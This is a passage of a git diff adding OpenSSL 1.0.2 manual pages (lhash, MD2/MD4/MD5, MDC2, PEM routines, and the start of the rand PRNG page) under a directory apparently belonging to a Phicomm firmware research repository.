+expand.  if (hash-E<gt>down_load E<gt> load) =E<gt> contract.  The
+B<up_load> has a default value of 1 and B<down_load> has a default value
+of 2.  These numbers can be modified by the application by just
+playing with the B<up_load> and B<down_load> variables.  The 'load' is
+kept in a form which is multiplied by 256.  So
+hash-E<gt>up_load=8*256; will cause a load of 8 to be set.
+
+If you are interested in performance the field to watch is
+num_comp_calls.  The hash library keeps track of the 'hash' value for
+each item so when a lookup is done, the 'hashes' are compared, if
+there is a match, then a full compare is done, and
+hash-E<gt>num_comp_calls is incremented.  If num_comp_calls is not equal
+to num_delete plus num_retrieve it means that your hash function is
+generating hashes that are the same for different values.  It is
+probably worth changing your hash function if this is the case because
+even if your hash table has 10 items in a 'bucket', it can be searched
+with 10 B<unsigned long> compares and 10 linked list traverses.  This
+will be much less expensive that 10 calls to your compare function.
+
+lh_strhash() is a demo string hashing function:
+
+ unsigned long lh_strhash(const char *c);
+
+Since the B<LHASH> routines would normally be passed structures, this
+routine would not normally be passed to lh_<type>_new(), rather it would be
+used in the function passed to lh_<type>_new().
+
+=head1 SEE ALSO
+
+L<lh_stats(3)|lh_stats(3)>
+
+=head1 HISTORY
+
+The B<lhash> library is available in all versions of SSLeay and OpenSSL.
+lh_error() was added in SSLeay 0.9.1b.
+
+This manpage is derived from the SSLeay documentation.
+
+In OpenSSL 0.9.7, all lhash functions that were passed function pointers
+were changed for better type safety, and the function types LHASH_COMP_FN_TYPE,
+LHASH_HASH_FN_TYPE, LHASH_DOALL_FN_TYPE and LHASH_DOALL_ARG_FN_TYPE 
+became available.
+
+In OpenSSL 1.0.0, the lhash interface was revamped for even better
+type checking.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/md5.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/md5.pod
new file mode 100644
index 0000000..d11d5c3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/md5.pod
@@ -0,0 +1,101 @@
+=pod
+
+=head1 NAME
+
+MD2, MD4, MD5, MD2_Init, MD2_Update, MD2_Final, MD4_Init, MD4_Update,
+MD4_Final, MD5_Init, MD5_Update, MD5_Final - MD2, MD4, and MD5 hash functions
+
+=head1 SYNOPSIS
+
+ #include <openssl/md2.h>
+
+ unsigned char *MD2(const unsigned char *d, unsigned long n,
+                  unsigned char *md);
+
+ int MD2_Init(MD2_CTX *c);
+ int MD2_Update(MD2_CTX *c, const unsigned char *data,
+                  unsigned long len);
+ int MD2_Final(unsigned char *md, MD2_CTX *c);
+
+
+ #include <openssl/md4.h>
+
+ unsigned char *MD4(const unsigned char *d, unsigned long n,
+                  unsigned char *md);
+
+ int MD4_Init(MD4_CTX *c);
+ int MD4_Update(MD4_CTX *c, const void *data,
+                  unsigned long len);
+ int MD4_Final(unsigned char *md, MD4_CTX *c);
+
+
+ #include <openssl/md5.h>
+
+ unsigned char *MD5(const unsigned char *d, unsigned long n,
+                  unsigned char *md);
+
+ int MD5_Init(MD5_CTX *c);
+ int MD5_Update(MD5_CTX *c, const void *data,
+                  unsigned long len);
+ int MD5_Final(unsigned char *md, MD5_CTX *c);
+
+=head1 DESCRIPTION
+
+MD2, MD4, and MD5 are cryptographic hash functions with a 128 bit output.
+
+MD2(), MD4(), and MD5() compute the MD2, MD4, and MD5 message digest
+of the B<n> bytes at B<d> and place it in B<md> (which must have space
+for MD2_DIGEST_LENGTH == MD4_DIGEST_LENGTH == MD5_DIGEST_LENGTH == 16
+bytes of output). If B<md> is NULL, the digest is placed in a static
+array.
+
+The following functions may be used if the message is not completely
+stored in memory:
+
+MD2_Init() initializes a B<MD2_CTX> structure.
+
+MD2_Update() can be called repeatedly with chunks of the message to
+be hashed (B<len> bytes at B<data>).
+
+MD2_Final() places the message digest in B<md>, which must have space
+for MD2_DIGEST_LENGTH == 16 bytes of output, and erases the B<MD2_CTX>.
+
+MD4_Init(), MD4_Update(), MD4_Final(), MD5_Init(), MD5_Update(), and
+MD5_Final() are analogous using an B<MD4_CTX> and B<MD5_CTX> structure.
+
+Applications should use the higher level functions
+L<EVP_DigestInit(3)|EVP_DigestInit(3)>
+etc. instead of calling the hash functions directly.
+
+=head1 NOTE
+
+MD2, MD4, and MD5 are recommended only for compatibility with existing
+applications. In new applications, SHA-1 or RIPEMD-160 should be
+preferred.
+
+=head1 RETURN VALUES
+
+MD2(), MD4(), and MD5() return pointers to the hash value. 
+
+MD2_Init(), MD2_Update(), MD2_Final(), MD4_Init(), MD4_Update(),
+MD4_Final(), MD5_Init(), MD5_Update(), and MD5_Final() return 1 for
+success, 0 otherwise.
+
+=head1 CONFORMING TO
+
+RFC 1319, RFC 1320, RFC 1321
+
+=head1 SEE ALSO
+
+L<sha(3)|sha(3)>, L<ripemd(3)|ripemd(3)>, L<EVP_DigestInit(3)|EVP_DigestInit(3)>
+
+=head1 HISTORY
+
+MD2(), MD2_Init(), MD2_Update() MD2_Final(), MD5(), MD5_Init(),
+MD5_Update() and MD5_Final() are available in all versions of SSLeay
+and OpenSSL.
+
+MD4(), MD4_Init(), and MD4_Update() are available in OpenSSL 0.9.6 and
+above.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/mdc2.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/mdc2.pod
new file mode 100644
index 0000000..41f648a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/mdc2.pod
@@ -0,0 +1,64 @@
+=pod
+
+=head1 NAME
+
+MDC2, MDC2_Init, MDC2_Update, MDC2_Final - MDC2 hash function
+
+=head1 SYNOPSIS
+
+ #include <openssl/mdc2.h>
+
+ unsigned char *MDC2(const unsigned char *d, unsigned long n,
+                  unsigned char *md);
+
+ int MDC2_Init(MDC2_CTX *c);
+ int MDC2_Update(MDC2_CTX *c, const unsigned char *data,
+                  unsigned long len);
+ int MDC2_Final(unsigned char *md, MDC2_CTX *c);
+
+=head1 DESCRIPTION
+
+MDC2 is a method to construct hash functions with 128 bit output from
+block ciphers.  These functions are an implementation of MDC2 with
+DES.
+
+MDC2() computes the MDC2 message digest of the B<n>
+bytes at B<d> and places it in B<md> (which must have space for
+MDC2_DIGEST_LENGTH == 16 bytes of output). If B<md> is NULL, the digest
+is placed in a static array.
+
+The following functions may be used if the message is not completely
+stored in memory:
+
+MDC2_Init() initializes a B<MDC2_CTX> structure.
+
+MDC2_Update() can be called repeatedly with chunks of the message to
+be hashed (B<len> bytes at B<data>).
+
+MDC2_Final() places the message digest in B<md>, which must have space
+for MDC2_DIGEST_LENGTH == 16 bytes of output, and erases the B<MDC2_CTX>.
+
+Applications should use the higher level functions
+L<EVP_DigestInit(3)|EVP_DigestInit(3)> etc. instead of calling the
+hash functions directly.
+
+=head1 RETURN VALUES
+
+MDC2() returns a pointer to the hash value. 
+
+MDC2_Init(), MDC2_Update() and MDC2_Final() return 1 for success, 0 otherwise.
+
+=head1 CONFORMING TO
+
+ISO/IEC 10118-2, with DES
+
+=head1 SEE ALSO
+
+L<sha(3)|sha(3)>, L<EVP_DigestInit(3)|EVP_DigestInit(3)>
+
+=head1 HISTORY
+
+MDC2(), MDC2_Init(), MDC2_Update() and MDC2_Final() are available since
+SSLeay 0.8.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/pem.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/pem.pod
new file mode 100644
index 0000000..21e9fe3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/pem.pod
@@ -0,0 +1,480 @@
+=pod
+
+=head1 NAME
+
+PEM, PEM_read_bio_PrivateKey, PEM_read_PrivateKey, PEM_write_bio_PrivateKey, PEM_write_PrivateKey, PEM_write_bio_PKCS8PrivateKey, PEM_write_PKCS8PrivateKey, PEM_write_bio_PKCS8PrivateKey_nid, PEM_write_PKCS8PrivateKey_nid, PEM_read_bio_PUBKEY, PEM_read_PUBKEY, PEM_write_bio_PUBKEY, PEM_write_PUBKEY, PEM_read_bio_RSAPrivateKey, PEM_read_RSAPrivateKey, PEM_write_bio_RSAPrivateKey, PEM_write_RSAPrivateKey, PEM_read_bio_RSAPublicKey, PEM_read_RSAPublicKey, PEM_write_bio_RSAPublicKey, PEM_write_RSAPublicKey, PEM_read_bio_RSA_PUBKEY, PEM_read_RSA_PUBKEY, PEM_write_bio_RSA_PUBKEY, PEM_write_RSA_PUBKEY, PEM_read_bio_DSAPrivateKey, PEM_read_DSAPrivateKey, PEM_write_bio_DSAPrivateKey, PEM_write_DSAPrivateKey, PEM_read_bio_DSA_PUBKEY, PEM_read_DSA_PUBKEY, PEM_write_bio_DSA_PUBKEY, PEM_write_DSA_PUBKEY, PEM_read_bio_DSAparams, PEM_read_DSAparams, PEM_write_bio_DSAparams, PEM_write_DSAparams, PEM_read_bio_DHparams, PEM_read_DHparams, PEM_write_bio_DHparams, PEM_write_DHparams, PEM_read_bio_X509, PEM_read_X509, PEM_write_bio_X509, PEM_write_X509, PEM_read_bio_X509_AUX, PEM_read_X509_AUX, PEM_write_bio_X509_AUX, PEM_write_X509_AUX, PEM_read_bio_X509_REQ, PEM_read_X509_REQ, PEM_write_bio_X509_REQ, PEM_write_X509_REQ, PEM_write_bio_X509_REQ_NEW, PEM_write_X509_REQ_NEW, PEM_read_bio_X509_CRL, PEM_read_X509_CRL, PEM_write_bio_X509_CRL, PEM_write_X509_CRL, PEM_read_bio_PKCS7, PEM_read_PKCS7, PEM_write_bio_PKCS7, PEM_write_PKCS7, PEM_read_bio_NETSCAPE_CERT_SEQUENCE, PEM_read_NETSCAPE_CERT_SEQUENCE, PEM_write_bio_NETSCAPE_CERT_SEQUENCE, PEM_write_NETSCAPE_CERT_SEQUENCE - PEM routines
+
+=head1 SYNOPSIS
+
+ #include <openssl/pem.h>
+
+ EVP_PKEY *PEM_read_bio_PrivateKey(BIO *bp, EVP_PKEY **x,
+					pem_password_cb *cb, void *u);
+
+ EVP_PKEY *PEM_read_PrivateKey(FILE *fp, EVP_PKEY **x,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_PrivateKey(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
+					unsigned char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_PrivateKey(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
+					unsigned char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_PKCS8PrivateKey(BIO *bp, EVP_PKEY *x, const EVP_CIPHER *enc,
+					char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_PKCS8PrivateKey(FILE *fp, EVP_PKEY *x, const EVP_CIPHER *enc,
+					char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_PKCS8PrivateKey_nid(BIO *bp, EVP_PKEY *x, int nid,
+					char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_PKCS8PrivateKey_nid(FILE *fp, EVP_PKEY *x, int nid,
+					char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ EVP_PKEY *PEM_read_bio_PUBKEY(BIO *bp, EVP_PKEY **x,
+					pem_password_cb *cb, void *u);
+
+ EVP_PKEY *PEM_read_PUBKEY(FILE *fp, EVP_PKEY **x,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_PUBKEY(BIO *bp, EVP_PKEY *x);
+ int PEM_write_PUBKEY(FILE *fp, EVP_PKEY *x);
+
+ RSA *PEM_read_bio_RSAPrivateKey(BIO *bp, RSA **x,
+					pem_password_cb *cb, void *u);
+
+ RSA *PEM_read_RSAPrivateKey(FILE *fp, RSA **x,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_RSAPrivateKey(BIO *bp, RSA *x, const EVP_CIPHER *enc,
+					unsigned char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_RSAPrivateKey(FILE *fp, RSA *x, const EVP_CIPHER *enc,
+					unsigned char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ RSA *PEM_read_bio_RSAPublicKey(BIO *bp, RSA **x,
+					pem_password_cb *cb, void *u);
+
+ RSA *PEM_read_RSAPublicKey(FILE *fp, RSA **x,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_RSAPublicKey(BIO *bp, RSA *x);
+
+ int PEM_write_RSAPublicKey(FILE *fp, RSA *x);
+
+ RSA *PEM_read_bio_RSA_PUBKEY(BIO *bp, RSA **x,
+					pem_password_cb *cb, void *u);
+
+ RSA *PEM_read_RSA_PUBKEY(FILE *fp, RSA **x,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_RSA_PUBKEY(BIO *bp, RSA *x);
+
+ int PEM_write_RSA_PUBKEY(FILE *fp, RSA *x);
+
+ DSA *PEM_read_bio_DSAPrivateKey(BIO *bp, DSA **x,
+					pem_password_cb *cb, void *u);
+
+ DSA *PEM_read_DSAPrivateKey(FILE *fp, DSA **x,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_DSAPrivateKey(BIO *bp, DSA *x, const EVP_CIPHER *enc,
+					unsigned char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_DSAPrivateKey(FILE *fp, DSA *x, const EVP_CIPHER *enc,
+					unsigned char *kstr, int klen,
+					pem_password_cb *cb, void *u);
+
+ DSA *PEM_read_bio_DSA_PUBKEY(BIO *bp, DSA **x,
+					pem_password_cb *cb, void *u);
+
+ DSA *PEM_read_DSA_PUBKEY(FILE *fp, DSA **x,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_DSA_PUBKEY(BIO *bp, DSA *x);
+
+ int PEM_write_DSA_PUBKEY(FILE *fp, DSA *x);
+
+ DSA *PEM_read_bio_DSAparams(BIO *bp, DSA **x, pem_password_cb *cb, void *u);
+
+ DSA *PEM_read_DSAparams(FILE *fp, DSA **x, pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_DSAparams(BIO *bp, DSA *x);
+
+ int PEM_write_DSAparams(FILE *fp, DSA *x);
+
+ DH *PEM_read_bio_DHparams(BIO *bp, DH **x, pem_password_cb *cb, void *u);
+
+ DH *PEM_read_DHparams(FILE *fp, DH **x, pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_DHparams(BIO *bp, DH *x);
+
+ int PEM_write_DHparams(FILE *fp, DH *x);
+
+ X509 *PEM_read_bio_X509(BIO *bp, X509 **x, pem_password_cb *cb, void *u);
+
+ X509 *PEM_read_X509(FILE *fp, X509 **x, pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_X509(BIO *bp, X509 *x);
+
+ int PEM_write_X509(FILE *fp, X509 *x);
+
+ X509 *PEM_read_bio_X509_AUX(BIO *bp, X509 **x, pem_password_cb *cb, void *u);
+
+ X509 *PEM_read_X509_AUX(FILE *fp, X509 **x, pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_X509_AUX(BIO *bp, X509 *x);
+
+ int PEM_write_X509_AUX(FILE *fp, X509 *x);
+
+ X509_REQ *PEM_read_bio_X509_REQ(BIO *bp, X509_REQ **x,
+					pem_password_cb *cb, void *u);
+
+ X509_REQ *PEM_read_X509_REQ(FILE *fp, X509_REQ **x,
+					pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_X509_REQ(BIO *bp, X509_REQ *x);
+
+ int PEM_write_X509_REQ(FILE *fp, X509_REQ *x);
+
+ int PEM_write_bio_X509_REQ_NEW(BIO *bp, X509_REQ *x);
+
+ int PEM_write_X509_REQ_NEW(FILE *fp, X509_REQ *x);
+
+ X509_CRL *PEM_read_bio_X509_CRL(BIO *bp, X509_CRL **x,
+					pem_password_cb *cb, void *u);
+ X509_CRL *PEM_read_X509_CRL(FILE *fp, X509_CRL **x,
+					pem_password_cb *cb, void *u);
+ int PEM_write_bio_X509_CRL(BIO *bp, X509_CRL *x);
+ int PEM_write_X509_CRL(FILE *fp, X509_CRL *x);
+
+ PKCS7 *PEM_read_bio_PKCS7(BIO *bp, PKCS7 **x, pem_password_cb *cb, void *u);
+
+ PKCS7 *PEM_read_PKCS7(FILE *fp, PKCS7 **x, pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_PKCS7(BIO *bp, PKCS7 *x);
+
+ int PEM_write_PKCS7(FILE *fp, PKCS7 *x);
+
+ NETSCAPE_CERT_SEQUENCE *PEM_read_bio_NETSCAPE_CERT_SEQUENCE(BIO *bp,
+						NETSCAPE_CERT_SEQUENCE **x,
+						pem_password_cb *cb, void *u);
+
+ NETSCAPE_CERT_SEQUENCE *PEM_read_NETSCAPE_CERT_SEQUENCE(FILE *fp,
+						NETSCAPE_CERT_SEQUENCE **x,
+						pem_password_cb *cb, void *u);
+
+ int PEM_write_bio_NETSCAPE_CERT_SEQUENCE(BIO *bp, NETSCAPE_CERT_SEQUENCE *x);
+
+ int PEM_write_NETSCAPE_CERT_SEQUENCE(FILE *fp, NETSCAPE_CERT_SEQUENCE *x);
+
+=head1 DESCRIPTION
+
+The PEM functions read or write structures in PEM format. In
+this sense PEM format is simply base64 encoded data surrounded
+by header lines.
+
+For more details about the meaning of arguments see the
+B<PEM FUNCTION ARGUMENTS> section.
+
+Each operation has four functions associated with it. For
+clarity the term "B<foobar> functions" will be used to collectively
+refer to the PEM_read_bio_foobar(), PEM_read_foobar(),
+PEM_write_bio_foobar() and PEM_write_foobar() functions.
+
+The B<PrivateKey> functions read or write a private key in
+PEM format using an EVP_PKEY structure. The write routines use
+"traditional" private key format and can handle both RSA and DSA
+private keys. The read functions can additionally transparently
+handle PKCS#8 format encrypted and unencrypted keys too.
+
+PEM_write_bio_PKCS8PrivateKey() and PEM_write_PKCS8PrivateKey()
+write a private key in an EVP_PKEY structure in PKCS#8
+EncryptedPrivateKeyInfo format using PKCS#5 v2.0 password based encryption
+algorithms. The B<cipher> argument specifies the encryption algorithm to
+use: unlike all other PEM routines the encryption is applied at the
+PKCS#8 level and not in the PEM headers. If B<cipher> is NULL then no
+encryption is used and a PKCS#8 PrivateKeyInfo structure is used instead.
+
+PEM_write_bio_PKCS8PrivateKey_nid() and PEM_write_PKCS8PrivateKey_nid()
+also write out a private key as a PKCS#8 EncryptedPrivateKeyInfo however
+it uses PKCS#5 v1.5 or PKCS#12 encryption algorithms instead. The algorithm
+to use is specified in the B<nid> parameter and should be the NID of the
+corresponding OBJECT IDENTIFIER (see NOTES section).
+
+The B<PUBKEY> functions process a public key using an EVP_PKEY
+structure. The public key is encoded as a SubjectPublicKeyInfo
+structure.
+
+The B<RSAPrivateKey> functions process an RSA private key using an
+RSA structure. It handles the same formats as the B<PrivateKey>
+functions but an error occurs if the private key is not RSA.
+
+The B<RSAPublicKey> functions process an RSA public key using an
+RSA structure. The public key is encoded using a PKCS#1 RSAPublicKey
+structure.
+
+The B<RSA_PUBKEY> functions also process an RSA public key using
+an RSA structure. However the public key is encoded using a
+SubjectPublicKeyInfo structure and an error occurs if the public
+key is not RSA.
+
+The B<DSAPrivateKey> functions process a DSA private key using a
+DSA structure. It handles the same formats as the B<PrivateKey>
+functions but an error occurs if the private key is not DSA.
+
+The B<DSA_PUBKEY> functions process a DSA public key using
+a DSA structure. The public key is encoded using a
+SubjectPublicKeyInfo structure and an error occurs if the public
+key is not DSA.
+
+The B<DSAparams> functions process DSA parameters using a DSA
+structure. The parameters are encoded using a foobar structure.
+
+The B<DHparams> functions process DH parameters using a DH
+structure. The parameters are encoded using a PKCS#3 DHparameter
+structure.
+
+The B<X509> functions process an X509 certificate using an X509
+structure. They will also process a trusted X509 certificate but
+any trust settings are discarded.
+
+The B<X509_AUX> functions process a trusted X509 certificate using
+an X509 structure. 
+
+The B<X509_REQ> and B<X509_REQ_NEW> functions process a PKCS#10
+certificate request using an X509_REQ structure. The B<X509_REQ>
+write functions use B<CERTIFICATE REQUEST> in the header whereas
+the B<X509_REQ_NEW> functions use B<NEW CERTIFICATE REQUEST>
+(as required by some CAs). The B<X509_REQ> read functions will
+handle either form so there are no B<X509_REQ_NEW> read functions.
+
+The B<X509_CRL> functions process an X509 CRL using an X509_CRL
+structure.
+
+The B<PKCS7> functions process a PKCS#7 ContentInfo using a PKCS7
+structure.
+
+The B<NETSCAPE_CERT_SEQUENCE> functions process a Netscape Certificate
+Sequence using a NETSCAPE_CERT_SEQUENCE structure.
+
+=head1 PEM FUNCTION ARGUMENTS
+
+The PEM functions have many common arguments.
+
+The B<bp> BIO parameter (if present) specifies the BIO to read from
+or write to.
+
+The B<fp> FILE parameter (if present) specifies the FILE pointer to
+read from or write to.
+
+The PEM read functions all take an argument B<TYPE **x> and return
+a B<TYPE *> pointer. Where B<TYPE> is whatever structure the function
+uses. If B<x> is NULL then the parameter is ignored. If B<x> is not
+NULL but B<*x> is NULL then the structure returned will be written
+to B<*x>. If neither B<x> nor B<*x> is NULL then an attempt is made
+to reuse the structure at B<*x> (but see BUGS and EXAMPLES sections).
+Irrespective of the value of B<x> a pointer to the structure is always
+returned (or NULL if an error occurred).
+
+The PEM functions which write private keys take an B<enc> parameter
+which specifies the encryption algorithm to use, encryption is done
+at the PEM level. If this parameter is set to NULL then the private
+key is written in unencrypted form.
+
+The B<cb> argument is the callback to use when querying for the pass
+phrase used for encrypted PEM structures (normally only private keys).
+
+For the PEM write routines if the B<kstr> parameter is not NULL then
+B<klen> bytes at B<kstr> are used as the passphrase and B<cb> is
+ignored.
+
+If the B<cb> parameters is set to NULL and the B<u> parameter is not
+NULL then the B<u> parameter is interpreted as a null terminated string
+to use as the passphrase. If both B<cb> and B<u> are NULL then the
+default callback routine is used which will typically prompt for the
+passphrase on the current terminal with echoing turned off.
+
+The default passphrase callback is sometimes inappropriate (for example
+in a GUI application) so an alternative can be supplied. The callback
+routine has the following form:
+
+ int cb(char *buf, int size, int rwflag, void *u);
+
+B<buf> is the buffer to write the passphrase to. B<size> is the maximum
+length of the passphrase (i.e. the size of buf). B<rwflag> is a flag
+which is set to 0 when reading and 1 when writing. A typical routine
+will ask the user to verify the passphrase (for example by prompting
+for it twice) if B<rwflag> is 1. The B<u> parameter has the same
+value as the B<u> parameter passed to the PEM routine. It allows
+arbitrary data to be passed to the callback by the application
+(for example a window handle in a GUI application). The callback
+B<must> return the number of characters in the passphrase or 0 if
+an error occurred.
+
+=head1 EXAMPLES
+
+Although the PEM routines take several arguments in almost all applications
+most of them are set to 0 or NULL.
+
+Read a certificate in PEM format from a BIO:
+
+ X509 *x;
+ x = PEM_read_bio_X509(bp, NULL, 0, NULL);
+ if (x == NULL)
+	{
+	/* Error */
+	}
+
+Alternative method:
+
+ X509 *x = NULL;
+ if (!PEM_read_bio_X509(bp, &x, 0, NULL))
+	{
+	/* Error */
+	}
+
+Write a certificate to a BIO:
+
+ if (!PEM_write_bio_X509(bp, x))
+	{
+	/* Error */
+	}
+
+Write an unencrypted private key to a FILE pointer:
+
+ if (!PEM_write_PrivateKey(fp, key, NULL, NULL, 0, 0, NULL))
+	{
+	/* Error */
+	}
+
+Write a private key (using traditional format) to a BIO using
+triple DES encryption, the pass phrase is prompted for:
+
+ if (!PEM_write_bio_PrivateKey(bp, key, EVP_des_ede3_cbc(), NULL, 0, 0, NULL))
+	{
+	/* Error */
+	}
+
+Write a private key (using PKCS#8 format) to a BIO using triple
+DES encryption, using the pass phrase "hello":
+
+ if (!PEM_write_bio_PKCS8PrivateKey(bp, key, EVP_des_ede3_cbc(), NULL, 0, 0, "hello"))
+	{
+	/* Error */
+	}
+
+Read a private key from a BIO using the pass phrase "hello":
+
+ key = PEM_read_bio_PrivateKey(bp, NULL, 0, "hello");
+ if (key == NULL)
+	{
+	/* Error */
+	}
+
+Read a private key from a BIO using a pass phrase callback:
+
+ key = PEM_read_bio_PrivateKey(bp, NULL, pass_cb, "My Private Key");
+ if (key == NULL)
+	{
+	/* Error */
+	}
+
+Skeleton pass phrase callback:
+
+ int pass_cb(char *buf, int size, int rwflag, void *u);
+	{
+	int len;
+	char *tmp;
+	/* We'd probably do something else if 'rwflag' is 1 */
+	printf("Enter pass phrase for \"%s\"\n", u);
+
+	/* get pass phrase, length 'len' into 'tmp' */
+	tmp = "hello";
+	len = strlen(tmp);
+
+	if (len <= 0) return 0;
+	/* if too long, truncate */
+	if (len > size) len = size;
+	memcpy(buf, tmp, len);
+	return len;
+	}
+
+=head1 NOTES
+
+The old B<PrivateKey> write routines are retained for compatibility.
+New applications should write private keys using the
+PEM_write_bio_PKCS8PrivateKey() or PEM_write_PKCS8PrivateKey() routines
+because they are more secure (they use an iteration count of 2048 whereas
+the traditional routines use a count of 1) unless compatibility with older
+versions of OpenSSL is important.
+
+The B<PrivateKey> read routines can be used in all applications because
+they handle all formats transparently.
+
+A frequent cause of problems is attempting to use the PEM routines like
+this:
+
+ X509 *x;
+ PEM_read_bio_X509(bp, &x, 0, NULL);
+
+this is a bug because an attempt will be made to reuse the data at B<x>
+which is an uninitialised pointer.
+
+=head1 PEM ENCRYPTION FORMAT
+
+This old B<PrivateKey> routines use a non standard technique for encryption.
+
+The private key (or other data) takes the following form: 
+
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: DES-EDE3-CBC,3F17F5316E2BAC89
+
+ ...base64 encoded data...
+ -----END RSA PRIVATE KEY-----
+
+The line beginning DEK-Info contains two comma separated pieces of information:
+the encryption algorithm name as used by EVP_get_cipherbyname() and an 8
+byte B<salt> encoded as a set of hexadecimal digits.
+
+After this is the base64 encoded encrypted data.
+
+The encryption key is determined using EVP_BytesToKey(), using B<salt> and an
+iteration count of 1. The IV used is the value of B<salt> and *not* the IV
+returned by EVP_BytesToKey().
+
+=head1 BUGS
+
+The PEM read routines in some versions of OpenSSL will not correctly reuse
+an existing structure. Therefore the following:
+
+ PEM_read_bio_X509(bp, &x, 0, NULL);
+
+where B<x> already contains a valid certificate, may not work, whereas: 
+
+ X509_free(x);
+ x = PEM_read_bio_X509(bp, NULL, 0, NULL);
+
+is guaranteed to work.
+
+=head1 RETURN CODES
+
+The read routines return either a pointer to the structure read or NULL
+if an error occurred.
+
+The write routines return 1 for success or 0 for failure.
+
+=head1 SEE ALSO
+
+L<EVP_get_cipherbyname(3)|EVP_get_cipherbyname>, L<EVP_BytesToKey(3)|EVP_BytesToKey(3)>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/rand.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/rand.pod
new file mode 100644
index 0000000..d102df2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/rand.pod
@@ -0,0 +1,175 @@
+=pod
+
+=head1 NAME
+
+rand - pseudo-random number generator
+
+=head1 SYNOPSIS
+
+ #include <openssl/rand.h>
+
+ int  RAND_set_rand_engine(ENGINE *engine);
+
+ int  RAND_bytes(unsigned char *buf, int num);
+ int  RAND_pseudo_bytes(unsigned char *buf, int num);
+
+ void RAND_seed(const void *buf, int num);
+ void RAND_add(const void *buf, int num, int entropy);
+ int  RAND_status(void);
+
+ int  RAND_load_file(const char *file, long max_bytes);
+ int  RAND_write_file(const char *file);
+ const char *RAND_file_name(char *file, size_t num);
+
+ int  RAND_egd(const char *path);
+
+ void RAND_set_rand_method(const RAND_METHOD *meth);
+ const RAND_METHOD *RAND_get_rand_method(void);
+ RAND_METHOD *RAND_SSLeay(void);
+
+ void RAND_cleanup(void);
+
+ /* For Win32 only */
+ void RAND_screen(void);
+ int RAND_event(UINT, WPARAM, LPARAM);
+
+=head1 DESCRIPTION
+
+Since the introduction of the ENGINE API, the recommended way of controlling
+default implementations is by using the ENGINE API functions. The default
+B<RAND_METHOD>, as set by RAND_set_rand_method() and returned by
+RAND_get_rand_method(), is only used if no ENGINE has been set as the default
+"rand" implementation. Hence, these two functions are no longer the recommended
+way to control defaults.
+
+If an alternative B<RAND_METHOD> implementation is being used (either set
+directly or as provided by an ENGINE module), then it is entirely responsible
+for the generation and management of a cryptographically secure PRNG stream. The
+mechanisms described below relate solely to the software PRNG implementation
+built in to OpenSSL and used by default.
+
+These functions implement a cryptographically secure pseudo-random
+number generator (PRNG). It is used by other library functions for
+example to generate random keys, and applications can use it when they
+need randomness.
+
+A cryptographic PRNG must be seeded with unpredictable data such as
+mouse movements or keys pressed at random by the user. This is
+described in L<RAND_add(3)|RAND_add(3)>. Its state can be saved in a seed file
+(see L<RAND_load_file(3)|RAND_load_file(3)>) to avoid having to go through the
+seeding process whenever the application is started.
+
+L<RAND_bytes(3)|RAND_bytes(3)> describes how to obtain random data from the
+PRNG. 
+
+=head1 INTERNALS
+
+The RAND_SSLeay() method implements a PRNG based on a cryptographic
+hash function.
+
+The following description of its design is based on the SSLeay
+documentation:
+
+First up I will state the things I believe I need for a good RNG.
+
+=over 4
+
+=item 1
+
+A good hashing algorithm to mix things up and to convert the RNG 'state'
+to random numbers.
+
+=item 2
+
+An initial source of random 'state'.
+
+=item 3
+
+The state should be very large.  If the RNG is being used to generate
+4096 bit RSA keys, 2 2048 bit random strings are required (at a minimum).
+If your RNG state only has 128 bits, you are obviously limiting the
+search space to 128 bits, not 2048.  I'm probably getting a little
+carried away on this last point but it does indicate that it may not be
+a bad idea to keep quite a lot of RNG state.  It should be easier to
+break a cipher than guess the RNG seed data.
+
+=item 4
+
+Any RNG seed data should influence all subsequent random numbers
+generated.  This implies that any random seed data entered will have
+an influence on all subsequent random numbers generated.
+
+=item 5
+
+When using data to seed the RNG state, the data used should not be
